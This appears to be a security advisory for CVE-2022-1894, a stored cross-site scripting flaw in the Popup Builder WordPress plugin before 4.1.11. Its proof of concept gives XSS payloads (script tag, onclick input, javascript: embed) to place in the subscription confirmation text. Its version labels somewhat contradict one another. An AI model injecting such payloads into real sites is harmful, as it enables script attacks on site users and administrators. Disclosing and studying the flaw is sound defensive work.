Popup Builder < 4.1.11 – Admin+ Stored Cross-Site Scripting | CVE 2022-1894

Description

The plugin does not escape and sanitize some settings, which could allow high privilege users to perform Stored Cross-Site Scripting attacks when the unfiltred_html is disallowed

Proof of Concept

Create/edit a subscription, enabled the GDPR options in it and add the following payload in the "confirmation text" settings:

v < 4.1.10 - <script>alert(/XSS/)</script>
v <= 4.1.10:
  <input class='js-subs-submit-btn' onclick='javascript:alert(/XSS/)' type='submit' value='Subscribe' style='width:300px;height:40px;background-color:#007fe1 !important;color:#FFFFFF;border-radius:4px !important;border-width:0px !important;border-color:#007fe1 !important;text-transform:none !important;border-style:solid'/>

  <embed src='javascript:alert(/XSS/)'> (<- will only works in the backend, when updating the Popup and the confirmation text changed)

The XSS will be triggered when viewing/previewing the subscription popup (and clicking on the Subscribe button for version >= 4.1.10)